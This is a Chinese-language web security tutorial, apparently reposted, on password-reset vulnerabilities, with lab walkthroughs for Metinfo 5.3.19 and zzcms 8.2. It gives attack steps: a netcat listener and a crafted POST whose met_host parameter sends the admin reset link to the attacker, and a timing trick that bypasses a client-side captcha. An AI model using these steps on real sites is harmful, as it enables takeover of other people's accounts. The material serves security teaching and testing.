密碼重置漏洞
概念
隨著互聯網的快速發展,在線支付業務的日漸成熟,大批的網上商城涌入互聯網.為了方
便網上商城的快速上線,很多該型別的應用程式在未能嚴格審查原始碼的情況下就開始上線,導致很多邏輯錯誤型別的漏洞出現在應用程式中,而密碼重置漏洞便是其中的一種,
漏洞位置在找回密碼處,由于驗證設計過于簡單,而且對校驗碼的校驗使用次數沒有
進行限制,導致正確的驗證碼可以被列舉爆破,從而重置密碼,此方法也是最常見的重置密
碼的方式,因為大多數廠商最開始的設定都是采取的 4-6 位純數字驗證碼的驗證方式,而且是沒有防止爆破的設計,
當然除了上述的由于驗證不嚴格導致的密碼重置案例,還有諸如:敏感資訊泄露(把明
文密碼通過 e-mail 發送給用戶)重置密碼訊息劫持(攻擊會者接收到密碼重置資訊)這些都是在密碼重置功能中比較常見的漏洞
漏洞型別

相關參考:任意用戶密碼重置的10種姿勢 | 阿德馬Web安全
漏洞測驗

實踐操作
操作二 Metinfo 5.3.19管理員密碼重置漏洞
環境準備
- 作業系統:Windows 2003 kali linux
- 網站環境:UPUPW 5.3
- 使用工具:burpsuite 1.6 beta
漏洞分析
- 密碼重置程序中驗證不嚴,
- 漏洞涉及到的幾個檔案分別是:
admin/admin/getpassword.php
include/common.inc.php
include/jmail.php
include/export.func.php
3.具體的文章分析可參照:【Web滲透】Metinfo 5.3.19 管理員密碼重置漏洞分析 | h3h3da's Blog
漏洞驗證利用
1.在攻擊機上使用nc進行埠監聽
nc -lvvp 80

2.配置瀏覽器代理
3.利用Burp Suite或者其他工具構造出如下的HTTP請求
POST /admin/admin/getpassword.php?met_host=IP地址 HTTP/1.1

4.點擊“Go”發送請求資料,然后回傳nc監聽的主機,我們可以看到回傳的回應資訊,其中便包含著密碼重置的鏈接,


5.將獲取到的密碼重置鏈接復制到瀏覽器中訪問,即可重置管理員admin的密碼口令,


操作三 zzcms 8.2前臺密碼重置漏洞
環境準備
- 作業系統:Windows 2003
- 網站環境:UPUPW 5.3
- 使用工具:burpsuite 1.6 beta
漏洞分析
- 漏洞的原因是,程式是通過前端的代碼來最終判斷驗證碼是否正確,但是開發者卻忽視了前端代碼我們是可以控制的,因此可以繞過驗證碼,從而可以重置密碼,
- 涉及到的漏洞代碼檔案:
ajax/ajax/yzm_check_ajax.php
- 可參考該文章
漏洞驗證利用
1.首先注冊一個普通用戶test,密碼為123456,

2.注冊成功后,訪問會員登錄頁面,點擊“忘記密碼”選項,

3.跳轉到“找回密碼”頁面,按照提示輸入我們想要重置賬戶名(test)

4.進入第二步“進行安全驗證”隨意填寫一個驗證碼,例如1234等等,確保輸入后點擊
下一步一定要快,在出現下方紅色的警告前,點擊下一步,可繞過驗證,進入到重置密碼界面,

5.按照提示輸入新密碼,便可重置test賬戶的密碼口令,


https://pino-hd.github.io/2018/06/19/zzcms8-2%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE/
https://bbs.ichunqiu.com/thread-35237-1-1.html
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/299473.html
標籤:其他
上一篇:XSS專題
